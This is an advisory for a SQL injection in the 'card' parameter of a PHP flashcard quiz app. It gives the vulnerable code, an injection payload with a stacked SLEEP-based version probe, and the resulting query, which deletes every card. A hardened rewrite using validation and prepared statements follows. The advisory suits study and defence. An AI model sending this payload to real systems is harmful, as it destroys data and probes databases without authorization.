Exploits / Vulnerability Discovered: 2024-02-26
Type: remote
Platform: php
This exploit / vulnerability, Flashcard quiz app v1.0 'card' SQL injection, is for educational purposes only; if you use it, you do so at your own risk!
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:

```php
// Attacker-controlled value taken straight from the URL
$card = $_GET['card'];
// Vulnerable: the value is concatenated into the SQL text
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
```

2. Payload:

```
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
```

3. Injected Query:

```sql
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
```
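
A hardened form of the delete shown above, as an added example (not the application's own code): the `card` value is allow-listed as a positive integer and bound through a placeholder. Only `tbl_card` and `tbl_card_id` come from the page; the function names, the `question` column and the in-memory SQLite database (standing in for the app's MySQL database so the script runs offline with `pdo_sqlite`) are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed demo database: SQLite in memory stands in for MySQL (assumption).
function openDemoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE tbl_card (tbl_card_id INTEGER PRIMARY KEY, question TEXT)');
    $pdo->exec("INSERT INTO tbl_card (question) VALUES ('q1'), ('q2'), ('q3')");
    return $pdo;
}

// Deletes one card. Returns the number of rows removed, or null if the id is rejected.
function deleteCard(PDO $pdo, string $rawCard): ?int
{
    // Layer 1: a card id is a positive integer and nothing else.
    $id = filter_var($rawCard, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Layer 2: the placeholder keeps the value out of the SQL text entirely.
    $stmt = $pdo->prepare('DELETE FROM tbl_card WHERE tbl_card_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function cardCount(PDO $pdo): int
{
    return (int) $pdo->query('SELECT COUNT(*) FROM tbl_card')->fetchColumn();
}

$pdo = openDemoDb();

// The payload from the page, passed where $_GET['card'] would be.
$payload = "' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --";

var_dump(deleteCard($pdo, $payload)); // payload fails the integer check
var_dump(cardCount($pdo));            // table contents after the rejected request
var_dump(deleteCard($pdo, '2'));      // a legitimate id
var_dump(cardCount($pdo));            // table contents after the legitimate delete
```

On a MySQL connection, also set `PDO::ATTR_EMULATE_PREPARES` to `false` and `PDO::MYSQL_ATTR_MULTI_STATEMENTS` to `false`, so the driver uses server-side prepared statements and refuses stacked statements such as the second one in the payload.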